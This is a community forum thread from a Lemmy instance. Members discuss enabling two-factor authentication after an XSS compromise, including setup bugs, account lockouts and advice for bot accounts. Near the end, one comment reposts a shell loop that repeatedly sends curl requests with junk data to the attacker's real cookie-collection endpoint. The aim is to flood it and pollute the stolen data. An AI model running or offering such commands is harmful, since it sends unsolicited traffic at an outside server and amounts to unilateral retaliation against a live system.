• Lodion 🇦🇺MA
    link
    fedilink
    English
    arrow-up
    11
    ·
    edit-2
    1 year ago

    I encourage everyone, but especially mods to enable 2FA on their account. I’ll do up a post tonight with screenshots on exactly how to do this, I realise the lemmy process isn’t as smooth as it could be. Ideally it would present a QR code to scan with with your phone as most other sites do.

    • Zagorath
      link
      fedilink
      English
      arrow-up
      6
      ·
      1 year ago

      Some points from the admin of ttrpg.network in our Discord chat:

      • the html injection seems not to apply to 18.1 (the version we’re on) [us too!], but if it does, it applies to the sidebar, posts, and comments (so a huge deal)
      • apparently there’s some concerns around the implementation (of 2fa) at the moment…maybe i’ll just shut it off for now and wait then…

      This thread explains the very serious risk of Lemmy’s current 2FA implementation.

      Real risk of locking yourself out of your account.

      • lordriffington
        link
        fedilink
        English
        arrow-up
        6
        ·
        1 year ago

        Yeah, 2fa didn’t work for me when I tried to set it up. Was just lucky I was logged in on more than one browser, so I could go and disable it.

      • Lodion 🇦🇺MA
        link
        fedilink
        English
        arrow-up
        4
        ·
        1 year ago

        Real risk of locking yourself out of your account.

        yes, the initial setup is not intuitive at all. Once setup it functions normally.

        • maniacalmanicmania
          link
          fedilink
          English
          arrow-up
          3
          ·
          1 year ago

          Thanks. I’m going to wait for your guide. What do you advise we do with bot accounts?

            • maniacalmanicmania
              link
              fedilink
              English
              arrow-up
              3
              ·
              1 year ago

              Thanks. This worked. I got a little confused with points 3, 4 and 5 but now that I’ve re-read your instructions I see that they are clear and I have no suggestions for improving them at this time.

            • Gorgritch_Umie_Killa
              link
              fedilink
              English
              arrow-up
              2
              ·
              1 year ago

              Hey, so i followed the guide. I think i hit all the steps, but when i try to log in on the browser to test whether its worked. The 2fa box does come up. But when i enter the code and hit login theres no progression on from that screen. Not sure where i’ve gone wrong? Using Aegis btw.

              • Lodion 🇦🇺MA
                link
                fedilink
                English
                arrow-up
                2
                ·
                1 year ago

                Hmm you may need to disable 2FA again. I’m not sure why it wouldn’t work, perhaps Aegis hasn’t imported it correctly?

          • Lodion 🇦🇺MA
            link
            fedilink
            English
            arrow-up
            3
            ·
            1 year ago

            In the short term, use a 60 character password and never use that account interactively. ie only use it with your scripts/bot. And obviously keep the password securely stored.

    • Rusty Raven
      link
      fedilink
      English
      arrow-up
      3
      ·
      1 year ago

      Mine just won’t enable it at all. I have it set up on my other account, but this one when I hit save nothing happens.

      • Lodion 🇦🇺MA
        link
        fedilink
        English
        arrow-up
        3
        ·
        edit-2
        1 year ago

        That is one of the issues… if you tick the box to enable 2FA and hit save, you then need to hit F5/refresh for the ‘2FA Installation link’ to appear.

        Actually making use of the 2FA installation link is also not intuitive… as I said I’ll try and post a sequence of screenshots tonight with a fresh test account to show the process.

        • Rusty Raven
          link
          fedilink
          English
          arrow-up
          4
          ·
          1 year ago

          That didn’t work, but I have solved it. I had to take the emoji out of my display name. No idea why that has any impact, but it did.

              • Rusty Raven
                link
                fedilink
                English
                arrow-up
                3
                ·
                1 year ago

                The 2FA system might just be prejudiced against birds. I tried putting it back in after it was set up and it won’t save my settings if the emoji is there. It’s very weird.

              • Gloomy Bagel 🥯
                link
                fedilink
                English
                arrow-up
                2
                ·
                1 year ago

                thank you, and the 2FA set up was actually the easiest i’ve ever set up on iOS. a little too easy …

            • Rusty Raven
              link
              fedilink
              English
              arrow-up
              3
              ·
              1 year ago

              I’ve been playing around and it’s only some emojis it has a problem with. Your bagels are safe.

    • Aesecakes@lemmy.world
      link
      fedilink
      English
      arrow-up
      2
      ·
      1 year ago

      I tried doing this but have lost access to my aussie.zone account (same user name). I checked the 2FA box but I couldn’t see the extra setup steps (I think I refreshed the page), so I unchecked the box and saved. I then changed my pw. Now it seems to accept new pw but am getting incorrect 2FA token error. What do I do?

      • Lodion 🇦🇺MA
        link
        fedilink
        English
        arrow-up
        3
        ·
        1 year ago

        Oh bugger. Sorry, I’ll need to find out how to manually toggle 2FA on your account in the database. I won’t be able to do this until I get home this evening.

  • iKill10101@lemmy.bleh.au
    link
    fedilink
    English
    arrow-up
    8
    arrow-down
    1
    ·
    edit-2
    1 year ago

    I don’t know how people feel about “getting back” at the people compromising servers, but I did find an awesome comment on another post that basically gives you a Terminal command to inject garbage into the “hackers” server, meaning they’d have to sift through garbage to find proper session cookies.

    Link to the comment

    If you don’t want to click the comment (don’t blame you!), then this is what it says.

    Once every second, it grabs your computer name and the current system time, hashes them together to get a completely random string, trims off the shasum control characters and base64 encodes it to make everything look similar to what the attackers would be expecting, and sends it as a request to the same endpoint that their xss attack uses. It’ll run on Linux and macOS (and windows if you have a WSL vm set up!) and uses next to nothing in terms of system resources.

    And the code you can run in Terminal on macOS/Linux or Windows (if you have WSL installed):

    while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed 's/.\{3\}$//' | base64) > /dev/null ; sleep 1; done

      • zero_gravitas
        link
        fedilink
        English
        arrow-up
        2
        ·
        1 year ago

        Generic TLDs are terrible all round if you ask me, but I still can’t believe ICANN was somehow collectively stupid enough to approve ‘.zip’. Regulatory capture by Google, I guess?

        For anyone unaware of the issues with ‘.zip’ as a top-level domain, see here: https://financialstatement.zip/